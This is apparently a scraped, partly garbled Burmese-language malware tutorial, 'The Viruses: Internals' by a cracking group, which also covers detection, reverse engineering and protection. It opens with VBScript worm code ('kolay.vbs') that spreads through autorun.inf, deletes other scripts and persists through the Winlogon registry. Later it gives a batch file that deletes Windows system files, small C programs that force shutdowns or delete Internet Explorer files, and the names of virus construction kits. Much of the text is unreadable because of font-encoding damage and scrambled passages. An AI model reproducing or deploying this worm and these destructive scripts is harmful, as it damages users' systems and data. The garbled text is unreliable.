Shells.RegWrite \"HKCU\Software\Microsoft\Internet Explorer\Main\Window Title\", \"\"
Shells.RegWrite \"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page\", \"\"
Shells.RegWrite \"HKCR\vbsfile\DefaultIcon\", \"%SystemRoot%\System32\WScript.exe, 2\"
LookVBS \"vbs\", WinDir & \"\\"
LookVBS \"vbs\", Drives.Path & \"\\"
If Drives.DriveType = 1 Then
If Drives.Path <> \"A:\" Then
If Not Fso.FileExists(Drives.Path & \"\kolay.vbs\") Then
Set WriteAll = Fso.CreateTextFile(Drives.Path & \"\kolay.vbs\", 2, True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & \"\kolay.vbs\")
End If
If Fso.FileExists(Drives.Path & \"\autorun.inf\") Or Fso.FileExists(Drives.Path
& \"\AUTORUN.INF\") Then
Set Chg = Fso.GetFile(Drives.Path & \"\autorun.inf\")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & \"\autorun.inf\", 2, True)
WriteAll.WriteLine \"[autorun]\"
WriteAll.WriteLine \"shellexecute=wscript.exe kolay.vbs\"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & \"\autorun.inf\")
Else
Set WriteAll = Fso.CreateTextFile(Drives.Path & \"\autorun.inf\", 2, True)
WriteAll.WriteLine \"[autorun]\"
WriteAll.WriteLine \"shellexecute=wscript.exe kolay.vbs\"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & \"\autorun.inf\")
End If End If End If End If
End If
Next
If Count <> 1 Then
Wscript.sleep 10000
End If
Loop While Count <> 1
Sub LookVBS(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile, Cut, Delete
Set oFileSys = CreateObject(\"Scripting.FileSystemObject\")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut = Right(oFile.Name, 3)
If UCase(Cut) = UCase(File2Find) Then
If oFile.Name <> \"kolay.vbs\" Then Set Delete = oFileSys.DeleteFile(SrchPath & oFile.Name, True)
End If
Next
End Sub
Shells.RegWrite \"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit\"
, SystemDir & \"\userinit.exe,\" & _SystemDir & \"\wscript.exe \" & SystemDir & \"\kolay.vbs\"
Shells.Regdelete \"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL\"
Shells.RegWrite \"HKCU\Software\Microsoft\Internet Explorer\Main\Window Title\", \"\"
Shells.RegWrite \"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page\", \"\"
Shells.RegWrite \"HKCR\vbsfile\DefaultIcon\", \"%SystemRoot%\System32\WScript.exe, 2\"
yHk(28) Kolay Adkif;&yfpfuk'frsm;

tcef;(6)
Adkif;&yfpf&eftm; umuG,fjcif;
Adkif;&yfpf\ tqifhrsm;
1/ uGefysLwmAdkif;&yfpfrsm;tm; ¤if;wdkYudk 'DZdkif;jyKzefwD;jcif;rSpí z,f&Sm;&Sif;vif;cH&jcif;xd
atmufygtwkdif; tqifhrsm;owfrSwfEkdifygonf-
(u) 'DZkdif;jyKzefwD;jcif;/ Adkif;&yfpfuk'fudk y½dk*&rfbmompum;rsm; (odkY) Adkif;&yfpfzefwD;
onfh Construction Kit rsm;jzifh zefwD;a&;om;Muavonf/ y½dk*&rfa&;om;jcif;
ESifhywfoufí tajccH&Sdol rnfolrqdk Adkif;&yfpfwpfckudk zefwD;Edkifonf/
( c) yGm;rsm;jcif;/ Adkif;&yfpfonf yxrqHk;taejzifh tcsdeftwdkif;wmwpfckxd ypfrSwf
uGefysLwmwGif udk,fwkdifyGm;rsm;avonf/
( *) tvkyfvkyfjcif;/ Adkif;&yfpfonf uGefysLwmtoHk;jyKolrS tpysdK;vkyfaqmifjcif;rsdK;
(odkY) ul;pufcHxm;&aomy½dk*&rf tvkyfvkyfcsdefwGif touf0ifvmavonf/
(C) &SmazGawGY&Sdjcif;/ Adkif;&yfpftm; ypfrSwfuGefysLwmpepfrsm;udk ul;pufapaom Ncdrf;
ajcmufrItjzpf oabmxm;Ekdifygonf/ ¤if;\vkyfaqmifcsufrsm;onf ypfrSwf
pepf\ tcsuftvufrsm;udk BuD;rm;aomzsufqD;rI jzpfaponf/
( i) aygif;pyfjcif;/ Anti-virus aqmhzf0Jvfa&;om;olrsm;onf Adkif;&yfpfrsm;&efrS um
uG,frIrsm;udk jyKvkyfonf/
( p) z,f&Sm;&Sif;vif;jcif;/ uGefysLwmoHk;pGJolrsm;u Anti-virus aqmhzf0Jvf Update rsm;
udk toHk;jyKjcif;jzifh Adkif;&yfpfrsm;tm; z,f&Sm;avonf/
½dk;&Sif;aom Adkif;&yfpfrsm; zefwD;jcif;
2/ ,aeYacwfwGif Adkif;&yfpfrsm;zefwD;jcif;onf ,cifuuJhokdY Low-Level bmompum;rsm;
jzpfonfh Assembly ESifh C bmompum;wdkYudk wwfuRrf;&efrvdkawmhyg/ Batch? VB Script? AutoIT
Script ponfwdkYjzifh vG,fulaom Adkif;&yfpfrsm; a&;om;Edkifygonf/ EdkifiHwumrS Adkif;&yfpfa&;om;ol
rsm;onf rdrdwdkY\ Adkif;&yfpfrsm;udk uspfvpfonfxufuspfvpfatmif a&;om;MuNyD; Anti-virus rsm;rS
ajc&mcHEkdifjcif;r&Sdap&ef vSnfhpm;rIajrmufrsm;pGm xnfhoGif;a&;om;csdefwGif jynfwGif;rSAdkif;&yfpftrsm;pk
rSmrl Script rsm;udktajccHonfh Adkif;&yfpfa&;om;enf;rsm;udkom usifhoHk;aeMuqJjzpfonfudk awGY&NyD;
vSnfhpm;&efxuf ypfrSwfuGefysLwmudk wdkufcdkuf&efom OD;wnfaMumif;awGY&ygonf/
3/ Adkif;&yfpfa&;om;jcif;tm; &Sif;vif;vG,fulpGmod&SdEkdif&eftwGuf erlemy½dk*&rfwpfckudk
avhvmMunfhMuygrnf-
(u) Game.bat zdkifwpfckudkzefwD;NyD; atmufyguk'frsm;udk odrf;qnf;yg/
text @ echo off
delete c:\Windows\system32\*.*
delete c:\Widows\*.*

( c) xdk Game.bat zdkifudk bat2com Utility oHk;NyD; Game.com udkzefwD;yg/ xdktcg ½dk;
&Sif;aom Adkif;&yfpfwpfckudk &&Sdrnfjzpfygonf/
4/ yHk(29)? (30) ESifh (31)wdkYudkMunfhvQif C y½dk*&rfbmompum;jzifhvnf; ½dk;&Sif;aomAdkif;
&yfpfrsm;zefwD;EdkifaMumif; awGY&Sd&ygonf/ yHk(29)&Sduk'fonf uGefysLwmudkydwfaprnfjzpfygonf/
yHk(30)wGif azmfjyxm;aomuk'frSmrl Internet Explorer ajrmufrsm;pGmudk yGifhaprnfjzpfygonf/ yHk(31)
wGifazmfjyxm;onfhuk'fonf Internet Explorer Directory atmuf&Sdzdkifrsm;tm;vHk;udk zsufqD;ypf
rnfjzpfygonf/ rdrdwdkY tcsdefay;EdkifvQifay;Edkifovdk? uRrf;usifrIS&Sd&if &Sdovdk Adkif;&yfpfrsm;\ tpGrf;
xufrIonf uGmjcm;aernfomjzpfygonf/
#include<stdio.h>
#include<dos.h>
int main (void){
system("shutdown -s");
return 0;
}
yHk(29) C bmompum;jzifh a&;om;xm;aom Adkif;&yfpfy½dk*&rfwpfck
#include<stdio.h>
#include<dos.h>
int main (void){
for(; ;){
system("c:\\progra~1\\intern~1\\iexplore.exe");
}
return 0;
}
#include<stdio.h>
#include<dos.h>
int main(void){
system("cd c:\\progra~1\\intern~1");
system("del *.exe");
system("cls");
return 0;
}
Adkif;&yfpfzefwD;Edkifaom KIT rsm;
5/ Adkif;&yfpfrsm;udk y½dk*&rfa&;p&mrvdkbJ Kit rsm;jzifh vG,fulpGmzefwD;Edkifonfudk awGY&
onf/ Kit rsm;jzifh zefwD;xm;aom tcsdKUAdkif;&yfpfrsm;onf y½dk*&rfrmrsm;udk,fwkdifa&;om;xm;aom
Adkif;&yfpfrsm;xufyif vGefpGm tqifhjrifhaeMuonfudk awGY&Sd&ayonf/ ,cktcg Adkif;&yfpfxkwfvkyfEdkif
aom Kit rsm;udk tifwmeufwGif vG,fulpGm&SmazGEdkifNyD; xdk Kit rsm;onf Adkif;&yfpfwpfckudk tvdk
tavsmuf xkwfvkyfzefwD;Edkifaom y½dk*&rfrsm;jzpfonf/ Kit rsm;udk ¤if;wdkYESifhtwlwGJygvmaom
Help zdkifrsm;zwf½INyD; vG,fulpGmtoHk;jyKEkdifygonf/ erlem Virus Construction Kit rsm;rSm atmufyg
twkdif; jzpfygonf-
(u) Kefi's HTML Virus Construction Kit/ ¤if;onf Adkif;&yfpfESifh Trojan rsm;udk
zefwD;ay;aomy½dk*&rfjzpfNyD; rwlnDaomvkyfaqmifcsufrsm; jyKvkyfEkdifonfh Adkif;
&yfpfrsm;udk zefwD;ay;Ekdifygonf/

( c) Virus Creation Laboratory v1.0/ ¤if;onf Adkif;&yfpfrsm;? Trojan rsm;ESifh Logic
Bomb rsm;udk zefwD;Edkifaom Tool wpfckjzpfonf/
( *) The Smeg Virus Construction Kit/ ¤if;onf Polymorphic Engine jzpfNyD;
a&;om;xm;aomuk'fudk Adkif;&yfpfxkwfvkyf&eftwGuf csdwfqufay;onf/
Encryption ESifh Decryption twGufvnf; toHk;jyKEkdifonf/
(C) Rajaat's Tiny Flexible Mutator v1.1/ ¤if;onf Object Module wpfckjzpfNyD;
Adkif;&yfpf Scanner rsm;rS ½dk;&Sif;aom String rsm;toHk;rjyKEdkif&eftwGuf Adkif;&yfpf
uk'frsm;udk csdwfqufay;NyD; Adkif;&yfpfrsm;tm; Encrypt vkyfxm;jcif;udk usyef;
Registry rsm;ESifh usyef; Instruction rsm;oHk;NyD; usyef; Decrypt vkyfavonf/
Adkif;&yfpfrsm;tm; pHkprf;&SmazGjcif; enf;vrf;rsm;
6/ t½dk;&Sif;qHk;aom Adkif;&yfpfESifh Worm rsm;udkpHkprf;&SmazGjcif;enf;vrf;rSm tD;ar;vf
wpfapmifonf oHo,jzpfzG,f&Sd? r&Sd OD;pGmpdppfjcif;jzpfonf/ rdrdrodolxHrSay;ydkYjcif;avm (odkYr[kwf)
pmygtaMumif;t&mrsm;onf yHkrSefajymqdkaeMutaMumif;t&mrsm; [kwf? r[kwf pdppfNyD;rSom tD;
ar;vfudk owdxm;NyD;zGifh&rnfjzpfonf/ MyDoom ESifh W32.Novarg.A@mm Worm rsm;onf rsm;pGm
aomtifwmeuftoHk;jyKolrsm;udk ul;pufapcJhonf/ Adkif;&yfpf&efumuG,fa&;twGuf pHkprf;ppfaq;
jcif;? zdkifrsm;\ Integrity udkppfaq;jcif;ESifh Interceptor rsm;udktoHk;jyKjcif;wdkYudk jyKvkyfMuygonf/
pHkprf;ppfaq;jcif;
7/ Adkif;&yfpf Scanner rsm;onf Adkif;&yfpfrsm;udk pHkprf;&eftwGuf ta&;BuD;aom aqmhzf0Jvf
tpdwftydkif;rsm;jzpfonf/ tu,fí Scanner rsm;r&SdcJhaomf uGefysLwmpepfonf Adkif;&yfpf\wdkufcdkuf
jcif;cH&&ef tcGifhta&;rsm;avonf/ Anti-virus aqmhzf0Jvfrsm;udk yHkrSeftoHk;jyKNyD; ppfaq;onfh
Engine ESifh Adkif;&yfpft"dyÜg,fzGifhqkdcsufrsm;udk rMumcP tqifhjr§ifhay;jcif;rsm; jyKvkyf&ygrnf/ Adkif;
&yfpfrsm;udk atmufygtpDtpOftwdkif; pHkprf;jcif;jzifh ppfaq;od&SdEkdifygonf-
(u) tu,fí Adkif;&yfpfwpfckudk pHkprf;od&SdonfESifh Anti-virus a&mif;csolrsm;onf
Adkif;&yfpf\ vu©Pmrsm; (Signature String)udk pdppfMuavonf/
( c) a&mif;csolrsm;onf Adkif;&yfpf Signature String udk&SmazGay;Ekdifrnfh y½dk*&rfrsm;udk
a&;om;Muavonf/
( *) xGuf&Sdvmaom Scanner topfrsm;onf rSwfOmPfESifh System Sector rsm;wGif
Akdif;&yfpftopf\ Signature String rsm;udk&SmazGMuygonf/
(C) tu,fí wdkufqdkifppfaq;rIonf udkufnDcJhaomf Adkif;&yfpf&SdaMumif; owday;
ajymMum;rnfjzpfonf/ txl;owdjyK&efrSm Anti-virus rsm;onf od&SdNyD;xm;aom?
BudKwift"dyÜg,fzGifhqdkxm;aom Adkif;&yfpfrsm;udkom pHkprf;Ekdifavonf/
8/ Adkif;&yfpfrsm;pHkprf;&SmazGjcif;ESifhywfoufí ta&;BuD;aomtcsufrsm;rSm-
(u) Adkif;&yfpfa&;olrsm;onf &SdNyD;om;Adkif;&yfpfwpfckudk ajymif;vJjcif;jzifh ajrmufrsm;pGm
aomAdkif;&yfpfrsm;udk rMumcPzefwD;avh&dSMuonf/ Adkif;&yfpftopfwpfckudk zef
wD;&ef rdepftenf;rQomMumavonf/ wdkufcdkufolrsm;onf þodkYrMumcP
ajymif;vJzefwD;jcif;jzifh Scanner rsm;udk us½HI;apavonf/

( c) Scanner topfrsm;onf uk'frsm;udkcGJjcrf;pdwfjzmjcif;uJhodkYaom pHkprf;jcif;enf;
vrf;rsm;udk toHk;jyK&NyD; zdkifxJ&Sd ae&mrsdK;pHkwGif&Sdaeaom uk'frsm;udk ppfaq;&
avonf/
( *) tcsdKUaom Scanner rsm;onf uGefysLwm\rSwfOmPfwGif;ü Sandboxie uJhodkYaom
uGefysLwmtwkwpfckudk zefwD;MuNyD; y½dk*&rfrsm;udk xdkae&mwkxJwGif tvkyfvkyf
apNyD; prf;oyfMuavonf/ þenf;udk Heuristic Scanning [kac:avonf/
(C) Scanner rsm;toHk;jyKjcif;jzifh atmufygtusdK;aus;Zl;rsm; &&Sdavonf-
(1) y½dk*&rfrsm; tvkyfrvkyfrD ¤if;wdkYudk ppfaq;Ekdifjcif;/
(2) trnfrod (odkY) tzsuftarSmifhAdkif;&yfpfrsm; [kwf? r[kwf aqmhzf0Jvft
opf tm;ppfaq;Ekdifjcif;/
( i) Scanner rsm;\ t"dutm;enf;csufrSm atmufygtwdkif;jzpfonf-
(1) Scanner ta[mif;rsm;tm; r,HkMunf&Ekdifyg/ Adkif;&yfpfrsm;xkESifhxnfESifh wdk;
yGm;vmMuaomaMumifh Scanner a[mif;rsm;onf acwfrrDawmhay/ xdkY
aMumifh aemufqHk;ay: Scanner rsm;udk toHk;jyK&ayrnf/
(2) Adkif;&yfpfrsm;onf Scanner topfrsm;xuf ydkrdkvsifjrefpGm xGufay:aeMu
aomaMumifh Scanner topfrsm;oHk;pGJaevQifyif pdefac:rItopfrsm;udk awGY
BuHKae&OD;rnfom jzpfavonf/
zdkifrsm;\ Integrity udkppfaq;jcif;
9/ Integrity ppfaq;jcif;onf aqmhzf0Jvfa&;om;olrsm;rS ¤if;wdkYxkwfa0vdkufaom aqmhzf
0Jvfrsm; aumif;pGmtvkyfvkyfjcif; &Sd? r&Sdukd ppfaq;jcif;jzpfonf/ omref Integrity ppfaq;onfh
aqmhzf0Jvfrsm;\ tm;enf;csufrSm zdkifwpfck csdKU,Gif;ysufpD;cJhaomf ¤if;zdkifysufpD;&jcif;onf y½dk*&rf
a&;pOfu tm;enf;csufaMumifhavm? Akdif;&yfpfaMumifhavm[k rcGJjcm;Ekdifjcif;jzpfonf/ tcsdKUaom
tqifhjrifhonfh Integrity ppfaq;onfhaqmhzf0Jvfrsm;&SdNyD; ¤if;wdkYonf Adkif;&yfpf\jyKvkyfrIaMumifh
jzpfay:aom ajymif;vJjcif;trsdK;tpm;rsm;udk cGJjcrf;pdwfjzmpdppfEkdifavonf/ tcsdKUaom Integrity
ppfaq;onfhaqmhzf0Jvfrsm;onf Integrity ppfaq;jcif;udk Anti-virus enf;vrf;rsm;ESifh aygif;pyfMuav
onf/
Interceptor rsm;udktoHk;jyKjcif;
10/ Interceptor rsm;tm; t"dutoHk;jyK&jcif;onf Logic Bomb rsm;ESifh Trojan rsm;udk
wkHYjyef&eftwGuf jzpfavonf/ Interceptor rsm;onf uGef,ufudktoHk;jyK&efBudK;pm;jcif; (odkY) y½dk*&rf
udk Ncdrf;ajcmufEdkifaponfh vkyaf qmifcsufrsm;udk vkyfaqmifap&ef uGefysLwmpepftm; awmif;qdkjcif;
rsm;tm; xdef;csKyfavonf/ tu,fí xdkuJhodkYawmif;qdkrIrsm;udk &SmazGawGY&SdcJhaomf Interceptor rS
uGefysLwmtoHk;jyKoltm; xdkawmif;qkdcsufudk vkyfaqmifvkdjcif; &Sd? r&Sd ar;jref;NyD;rS qufvuf
vkyfaqmifaprnfjzpfonf/ tcsdKUaomAdkif;&yfpfrsm;onf xdkuJhodkYaom Mum;jzwfapmifhMunfha&;y½dk*&rf
rsm;udk ausmfvTm;EkdifpGrf;&Sdygonf/ Anit-virus y½dk*&rfrsm;ESifh Deep Freeze y½dk*&rfwdkYonf Interceptor
rsm;jzpfMuavonf/
nals V 1.0 - rhythm

Adkif;&yfpfrrsm;tm;cGJjcrfrf;pdwfjzmjcif;
11/ Adkif;&yfpfpfrsm;tm; Scanner rsm;?? Integrity Checker rsmm;? Intercepptor rsm;oHk;í apmifh
Munfhppfaaq;jcif;on nf jynfhpHkvHkavmufaommtajzwpfck r[kwfao;yg/ o Anti-virus rsm;o onfvnf;
Adkif;&yfpft
ta[mif;rsmm;ESifh Adkif;&yf & pfta[miif;rsm;udk jyefvnfjyKjyifxm;aom Adkif;&yfprfrsm;udkom
Adkif;&yfpft
tjzpf od&SEkdEdkifrnf jzpfygonf
yg / jynfwGif;rSa&;o om;aom Adkiiff;&yfpfrsm;ESififh enf;ynmmtopft
qef;toH oHk;jyKí a&;o om;xm;aommAdkif;&yfpfrsm;udk pHkprf;od&Sdjcif;? ESdrfESif;Ekdifjcif; jyKEkdifrnfr[kwfyg/ xdYk
aMumifh RReverse Enggineering yn nm&yftaMMumif
u ;udk ESHYpyfrSom rdrdud udk,fydkifOmPf
Pjzifh Adkif;&yfppfrsm;tm;
cGJjcrf;pdwf
wfjzmEdkifrnfjzpf
jz NyD; Akdif;&yf
& pfrsm;udk ESdrfESif;Edkifrnf
njzpfygonf nf/ Reverse Engineerinng ynm
&yfonf y½dk*&rf\ Binary (HEEX) uk'frsm;udk ¤if;wdkYa&;om;xm;o & onfhtcsdefu taetx xm;twkdif;
jyefvnf&&&Sdatmif azmf a xkwfí uk'frsm;udkjyifjcif;? uk'f'frsm;udk avh vhvmjcif;jyKvkvyfonfh yn nm&yfjzpf
onf/
12/ jynfwGifif;jzpfAdkif;&yfpfpftrsm;pkudk Autoit 3.x Script
S jzifhzefwD;a&;om;x xm;jcif;jzpfavonf
a /
Autoit y½dk*&rfonf ¤if;\ .au3 Script zdkifud uk .exe zdkiftjzpf
t ajymif;vJ vum Comppile vkyfay;;vdkufjcif;
jzpfavo onf/ tu, ,fí Autoitt jzifha&;omm;xm;aom Adkif;&yfpfrsmm;udk umuG,f&efESifh rrawmfrq
Adkif;&yfpfu
ul;pufcH&ygu u ESdrfESif;Ekdif&eftwGuf uf xkdAdkif;&yfyfpfzdkiftm; Autoit
A Decompiler y½d ½dk*&rfwpf
ckcktoHk;jyKj um ¤if;\rl \ &if;uk'fud uk &,lEdkif&ef
& BudK;pm;&&ygrnf/ xif x &Sm;aom Decompileer rsm;rSm
Exe2Autt? myAutToE Exe ESifh DeA AutoIt wdkYjzpfonf/ xdkuk'frsm;udk Mun nfh½Ijcif;jzifh Adkif;&yfpf\tvk
t yfvkyf
yHktao;ppdwfudk od&Sdem;vnf
e Ekdifrnf
r jzpfavo onf/
13/ EdkifiHwumrS
u Adkif;&yfyfpftrsm;pkud udMk unfhvQif Assembly
A ? Delphi ESifh Visual C+++ y½dk*&rf
bmompum;rsm;jzifh a&;om;xmm;MuNyD; tcsdsKUaomAdkif;&yfyfpfrsm;onf Packer ESifh Protector aqmhzf0Jvf
rsm; to oHk;jyKxm;aMMumif;awGY&Sd&ygonf y / Paccker qdkonfrSm WinRARR uJhodkYaomm zdkif\ t½G½G,ftpm;
udk csHKUayy;aomy½dk*&rf & jzpfNyD; WinRAR ESifhrwl r nDonfhtcsuft rSm Paacker jzifhumuG m ,fxm;aom .exe
zdkifrsm;o
onf oD;oefY&yfwnfEkdifMujcif Mu ;jzpfonf/ ¤if;wdkY\uk \ 'fudk jyefNyD; Decryppt (Unpackk) vkyf&ef
twGuf Encrypt(Pack) vkyfcJhaomaqmh o zf0Jvf
v&Sd&ef rvd vdktyfay/ Adkif;&yfpfa&;o om;olrsm;on nf zdkif\
t½G,ft tpm;ao;ap&&efESifh Adkif;&yf ; pfuk'frsm;ud
; k rnfod odYka&;om;xmm;onfudk rMunfh½Iap&&ef um
uG,f&eft tvdkYiSm Packker rsm;udk toH t k;jyKMuav vonf/ Prootector rsm;rSm ydkítqififjh rifhMuNyD; ¤ifif;wdkYonf
zdkif\t½G½G,ftpm;udk csHKUap&efxuf ¤if;wdkY\y½d \ k*&rfrsm;u udk Reverse Engineeringg vkyfjcif;rS umuG,f
&efjzpfonf/
yHk(322) IDA Pro Disassembller jzifh Akdif;&yf

& pfuk'frsm;u
udk ppfaq;x
xm;yHk

14/ Adkif;&yfpfzdkifrsm;udk uk'fjyefazmfEdkif&eftwGuf Olly Debugger ESifh IDA Pro Disassembler
uJhodkYaom Tool rsm;udk toHk;jyKMuavonf/ ¤if;tjyif oD;jcm;toHk;jyK&aom Tool rsm;vnf;&SdMu
ao;onf/ ¤if;wdkYrSm Resource rsm;udk Munfh½IjyifqifEdkifaom Resource Hacker? y½dk*&rfzdkifrsm;\
Portable Executable (PE) ESifhywfoufaomtcsuftvufrsm;udk Munfh½IjyifqifEkdifaom Lord PE?
ysufpD;aeaom Import rsm;udk jyifqif&eftwGuf Import Reconstructor ponfh Tool rsm;jzpfonf/
Reverse Engineering ynm&yfonf tvGef½IyfaxG;aomynm&yfjzpfNyD; Adkif;&yfpfuk'frsm;udk jyef
azmfjcif;onf Adkif;&yfpfa&;om;jcif;xuf tqrwefcufcJonfhtwGuf aemufqHk;xGuf&Sdaom y½dk*&rf
bmompum;rsm;? Packer/Protector rsm;? Debugger/Disassembler/Decompiler rsm;taMumif;udk
pOfqufrjywf avhvmae&rnfjzpfayonf/
Adkif;&yfpfrsm;tm; umuG,fjcif;
15/ Adkif;&yfpfrsm;tm; BudKwifumuG,fEkdif&eftwGuf atmufygtajccHtcsufrsm;udk em;vnf
od&Sdxm;&ayrnf-
(u) BudKwifumuG,fjcif;onf ukojcif;xuf ydkrdkxda&mufaMumif; em;vnfxm;&yg
rnf/ tcsdKUaomAdkif;&yfpfrsm;onf taESmifht,Sufay;jcif;oabmxuf zsufqD;
aESmifh,SufrIrsm;yg ygvmonfhtwGuf rdrdzdkifrsm;udk zsufqD;cJhjcif;jyKcJhvQif toHk;
jyKEdkifa&;twGuf ta&;BuD;aom tcsuftvufrsm;udk External Harddisk?
pD'D^'DADG'Drsm;jzifh Backup vkyfxm;jcif;rsdK; jyKvkyfxm;&ygrnf/
( c) zsufqD;cH&onfhzdkifrsm;udk jyefvnftzwfqnf&SmazGEdkif&ef Systweak Advanced
Disk Recovery uJhodkY Recovery vkyfay;onfhaqmhzf0JvfrsdK; aqmifxm;oifhyg
onf/ Adkif;&yfpfrS zdkifrsm;udkzsufonfjzpfap? Harddisk wpfckvHk;udk zsufqD;onf
jzpfap Systweak Advanced Disk Recovery aqmhzf0JvfrS zdkifrsm;udk twwfEkdifqHk;
jyefvnf&SmazGay;Ekdifygonf/
( *) rdrdtoHk;jyKaeaom Anti-virus y½dk*&rfonf Update rjzpfcJhaomf tjcm;olrsm;qD
rS iSm;&rf;xm;aom External Harddisk rsm;? Flash Drive rsm;udk toHk;jyKjcif;?
aqmhzf0JvfacGrsm;udk Install vkyfjcif;rjyKvkyf&ef owdxm;&ygrnf/ Adkif;&yfpfrsm;
ysHUESHYrItaMumif;rsm;xJwGif Flash Drive rsm;onf t"duw&m;cHrsm;jzpfMuygonf/
(C) rdrdrod&Sdaomolrsm;xHrS ydkYaomar;vfrsm;wGif Attachment taejzifhwGJxm;aom
zdkifrsm;udk zGifh&mwGif owdjyKízGifh&efvdktyfygonf/ Adkif;&yfpfrsm;onfar;vfrsm;rS
wqifhysHUESHUrI ydkrdkrsm;jym;aomaMumifhjzpfonf/
( i) vufcH,HkMunf&efenf;aom pD'D? 'DAGD'DacGrsm;rS Boot rvkyf&efESifh uGefysLwm\
AutoPlay pepfrsm;udk ydwfxm;&efvdktyfygonf/ pD'DtcsdKUwGif autorun.inf zdkifrsm;
ygavh&SdNyD; ¤if;zdkifrsm;wGif pD'DacGxnfhoGif;onfESifh Adkif;&yfpfzdkiftm; tvkyfvkyf
ap&ef owfrSwfcsufrsm; xnfhoGif;xm;aomaMumifhjzpfonf/
( p) jzpfEdkifygu vHkNcHKpdwfcs&rIjrifhaom pufvnfywfrIpepfudktoHk;jyKyg/ Mac OS
pepfonf Windows OS pepfxuf vHkNcHKrIydkrdk&Sdavonf/ ¤if;onf Disk tm;
ESpfoufovdk pDrHcefYcGJrItm; wm;jrpfxm;avonf/ Windows 8 OS wGifrl vHkNcHKrI
pepftm; tenf;i,fwif;Muyfxm;aMumif; awGU&Sd&ygonf/

(q) oHo,jzpfzG,f y½dk*&rfrsm;tm; prf;oyfEdkif&eftwGuf VMWare ESifh VirtualBox
uJhodkY Virtual Machine aqmhzf0Jvfrsm;toHk;jyKí rdrdBudKufESpfouf&m OS pepfrsm;
udkwifNyD; xdk OS rsm;wGif Adkif;&yfpf [kwf? r[kwf prf;oyfEdkifygonf/ tu,fí
Adkif;&yfpfjzpfvQifyif rdrdvuf&SdtoHk;jyKaom tcsuftvufrsm;udk Adkif;&yfpfu
zsufqD;Ekdifawmhrnfr[kwfay/
( Z) Deep Freeze? Time Freeze ESifh HD Guard aqmhzf0Jvfrsm;udk oHk;ívnf; Adkif;&yfpf
rsm;udk xda&mufpGm umuG,fEdkifygonf/ ¤if;y½dk*&rfrsm;onf Adkif;&yfpfrsm;zsuf
ypfvdkufaomzdkifrsm;udk uGefysLwmydwfNyD; jyefzGifhvdkufonfESifh rlvae&mwGif jyef
xm;ay;ygonf/ odkYaomf tqifhjrifhaom Adkif;&yfpfrsm;onf þy½dk*&rfrsm;udk
ausmfvTm;EdkifaMumif; awGY&Sd&ygonf/

udk;um;usrf;pm&if;
1/ Robert M. Slade, History of Computer Viruses, 1992.
2/ Pearson Education, Computer Virus Timeline, 2013.
3/ JSI Inc, Windows NT Tips Tricks and Registry Hacks, June 23 2006.
4/ Dynamic4u, How Computer Viruses Are Born? History, Origin Of Viruses, May 8 2010.
5/ Peter Szor & Peter Ferrie, Hunting for Metamorphic, 2001.
6/ John R. Quain, The 10 Worst Computer Viruses in History, July 20 2011.
7/ Peter Szor , The Art of Computer Virus: Research and Defense, Feb 3 2005.
8/ Ed Skoudis & Lenny Zeltser, Malware - Fighting Malicious Code, Nov 21 2003.
9/ Mark Ludwig, The Giant Black Book of Computer Viruses, 1995.
10/ Michael Erbschloe, Trojans Worms and Spyware - A Computer Security Professionals Guide to
Malicious Code, 2005.
11/ EC-Council , Ethical Hacking & Countermeasures - Threats & Defense Mechanisms, 2010.
12/ EC-Council , CEHv6 Module 28 - Writing Virus Codes, 2010.
13/ Michael Sikorski & Andrew Honig, Practical Malware Analysis, 2012.
14/ InnoBull Knowledge Solution, Virus and Worms (Malware), 2010.
15/ Shrishail, Mystery Behind the Windows Registry, 1999.
16/ rhythm, Cracker vrf;ñTef 2.3, Nov 22 2013.
17/ rhythm, The Viruses: Internals, 2013.
18/ rhythm, uGefysLwm uBuD;cauG;, 2011.
19/ http://www.f-secure.com/
20/ http://virus.wikia.com
21/ http://www.drwebhk.com/en/virus_techinfo/Trojan.StartPage.52496.html
22/ http://en.wikipedia.com

The Virus Internals

Uploaded by

Copyright:

Available Formats

The Virus Internals

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

The Virus Internals

Uploaded by

Copyright:

Available Formats

What are some common types of malware discussed in the document?

What are some common types of malware discussed in the document?

What are some examples of early computer viruses mentioned in the document?

What are some examples of early computer viruses mentioned in the document?

The Viruses : Internals V 1.

0 - rhythm (Myanmar Cracking Team) 1

20 Registry Editor ESifh Task Manager tm; toHk;jyKcGifhr&atmif wm;qD; 37 37

3/ rMumrDwGif Adkif;&yfpfa&;om;olrsm;u zdkifrsm;udk ul;pufjcif;onf pufvnfywfrIpepfrsm;

10/ 2002 ckESpfwGif Melissa Adkif;&yfpfa&;om;oltm; axmif'Pf vESpfq,f csrSwfcJhonf/

yHk(1) .exe zdkifwpfckudk Adkif;&yfpful;pufjcif; rjy

yHk(4) Stonedd Adkif;&yfpf rul

yHk((6) Stealth Adkif;&yfpfonf n ul;pufjcifif;rcH&aomzdzdkiftm; Antii-virus aqmhmhzf0Jvfrsm;t tm;

2/ Adkif;&yfpfrsm;onf uGefysLwmpepfpwif&eftwGuf vdktyfaomzdkifrsm;udk zsufqD;avh&Sd

3/ Windows 98 ESifh Windows Me wdkYwGif MS-DOS \ vkyfaqmifcsufrsm;udk OD;pGmvkyf

4/ ntldr rS boot.ini zdkifudk&SmazGavonf/ boot.ini wGif OS rsm;udk a½G;cs,fEkdifonfhpm&if;

yHk(9) Syystem Configuration Uttility (mscon

yHk(111) Logon Dialog

yHk(12) Registry wGif Winlogoon twGuf owf

yHk(14) ndows pwifcsd

yHk(15) ndows Adkif;&y

15/ other_sleep Function onf uGefysLwmpepf&Sd tjcm;aom Worm rsm;udk&SmazG&ef BudK;pm;

yHk(17) Morris Worm \ uk'frsm;

yHk(17) LOVEYOU Adkif;&yfpfudk

yHk(19) CodeRed \ Signature

